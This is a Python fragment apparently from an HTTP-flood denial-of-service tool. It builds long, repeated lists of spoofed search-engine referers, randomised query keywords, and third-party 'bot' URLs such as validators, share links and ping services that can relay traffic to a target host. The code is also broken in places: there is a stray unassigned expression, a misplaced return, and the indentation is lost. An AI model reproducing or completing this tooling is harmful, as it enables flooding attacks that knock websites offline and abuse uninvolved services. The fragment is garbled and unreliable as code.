headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
# generates a Keyword list
def keyword_list():
global keyword_top
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('<NAME>')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('adidas')
keyword_top.append('ask.fm')
keyword_top.append('adele')
keyword_top.append('5x nexus')
keyword_top.append('espn')
keyword_top.append('uggs')
keyword_top.append('uber')
keyword_top.append('american eagle')
keyword_top.append('jessica simpson')
keyword_top.append('jacket')
keyword_top.append('anderson east')
keyword_top.append('kroger')
('http://' + host + '/')
return(headers_referers)
def bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
